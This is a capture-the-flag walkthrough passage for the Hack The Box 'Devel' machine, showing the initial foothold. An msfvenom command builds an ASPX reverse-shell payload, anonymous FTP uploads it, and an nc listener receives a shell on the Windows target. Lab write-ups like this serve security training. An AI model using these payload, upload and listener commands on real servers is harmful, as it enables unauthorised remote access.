Exploitation

Initial Foothold

Knowing that we can put files lets put our reverse shell with MSVenom

msfvenom --list formats
#list all formats and we can see we can generate apsx paylaods

msfvenom --list payloads | grep windows

Generating Payload

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.34 LPORT=4444 -o reverse-shell.aspx

Uploading Payload

root@kali:/home/kali/HTB/Devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put reverse-shell.aspx 
local: reverse-shell.aspx remote: reverse-shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2749 bytes sent in 0.00 secs (24.0518 MB/s)
ftp>

Establishing Connection

kali@kali:~/HTB/Devel$ nc -lvnp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.5.
Ncat: Connection from 10.10.10.5:49161.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

c:\windows\system32\inetsrv>

PreviousScanning and Enumeration NextPost Exploitation

Last updated 5 years ago

Was this helpful?